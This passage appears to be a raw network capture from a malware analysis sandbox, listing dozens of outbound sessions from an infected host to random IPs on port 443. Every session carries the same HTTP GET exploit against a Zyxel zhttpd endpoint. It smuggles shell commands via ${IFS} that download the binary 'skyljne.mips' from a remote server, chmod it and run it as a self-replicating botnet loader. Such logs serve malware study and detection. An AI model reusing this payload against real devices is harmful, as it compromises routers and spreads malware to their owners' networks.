                                            Jan 14, 2024 15:50:27.217278957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1056192.168.2.2344856154.129.66.159443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.217312098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1057192.168.2.2351784130.131.239.221443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.217339039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1058192.168.2.2335624190.30.31.74443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.217356920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1059192.168.2.2339586136.196.205.26443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.217382908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1060192.168.2.2351040196.173.123.46443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.217434883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1061192.168.2.2358766175.76.142.57443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.217468023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1062192.168.2.2343192148.5.215.162443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.217489958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1063192.168.2.2352696130.162.18.241443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.220103979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1064192.168.2.2348392203.235.119.180443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.220127106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1065192.168.2.2336724136.253.166.188443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.220139027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1066192.168.2.235744464.122.199.2443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.226373911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1067192.168.2.235718299.87.29.204443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.224814892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1068192.168.2.2345502197.3.133.91443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.224874973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1069192.168.2.2341978149.227.228.227443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.224912882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1070192.168.2.2359240147.138.237.253443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.224951029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1071192.168.2.2357274192.71.47.79443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.224975109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1072192.168.2.2344978170.22.119.220443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.224999905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1073192.168.2.235820458.135.72.204443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.225022078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1074192.168.2.2345736179.112.80.221443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.225058079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1075192.168.2.2340684151.63.2.113443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.225059986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1076192.168.2.2344176161.165.203.72443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.225099087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1077192.168.2.2343786147.50.220.218443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.225162029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1078192.168.2.234566891.13.178.251443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.225177050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1079192.168.2.234864846.108.137.114443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.225198030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1080192.168.2.2354916106.134.94.62443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.225249052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1081192.168.2.2358294115.171.181.156443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.225281954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1082192.168.2.2335610168.215.38.205443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.225287914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1083192.168.2.233764437.71.44.97443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.225333929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1084192.168.2.2336672186.81.102.219443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.225373983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1085192.168.2.233773057.145.4.63443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.225383997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1086192.168.2.2355414208.104.241.55443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.225418091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1087192.168.2.2344142196.18.49.204443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.225461960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1088192.168.2.2349734173.38.255.90443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.225488901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1089192.168.2.2350580174.185.1.175443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.225507975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1090192.168.2.235689265.181.59.187443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.225574970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1091192.168.2.2333818174.180.58.69443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.225590944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1092192.168.2.2347086195.11.141.11443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.225606918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1093192.168.2.2350864165.50.82.153443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.225631952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1094192.168.2.2353226134.201.53.84443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.225656033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1095192.168.2.233406669.199.128.115443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.225696087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1096192.168.2.234999462.172.41.227443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.225724936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1097192.168.2.234289683.1.193.124443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.225729942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1098192.168.2.2345426148.136.24.149443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.225764036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1099192.168.2.234134668.167.137.109443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.225819111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1100192.168.2.235458058.187.173.163443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.225836992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1101192.168.2.235200254.159.227.154443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.225861073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1102192.168.2.2351616197.164.21.96443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.225908995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1103192.168.2.234606450.29.133.163443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.225943089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1104192.168.2.2335066212.42.126.113443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.225971937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1105192.168.2.2343478114.242.169.59443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.225986958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1106192.168.2.2348594183.116.79.120443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.226017952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1107192.168.2.2354424197.138.29.64443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.226057053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1108192.168.2.2355676209.1.155.243443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.226078033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1109192.168.2.234066459.209.16.154443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.226115942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1110192.168.2.2344730129.176.26.102443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.226150990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1111192.168.2.233942613.11.133.46443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.226191044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1112192.168.2.2342862171.202.49.247443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.226232052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1113192.168.2.2337744120.66.127.28443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.226279020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1114192.168.2.2349876141.87.140.100443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.226303101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1115192.168.2.233394680.183.125.199443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.226337910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1116192.168.2.2345356107.129.28.60443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.226381063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1117192.168.2.2353726182.20.67.170443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.226422071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1118192.168.2.2341814150.1.183.121443
                                            TimestampBytes transferredDirectionData
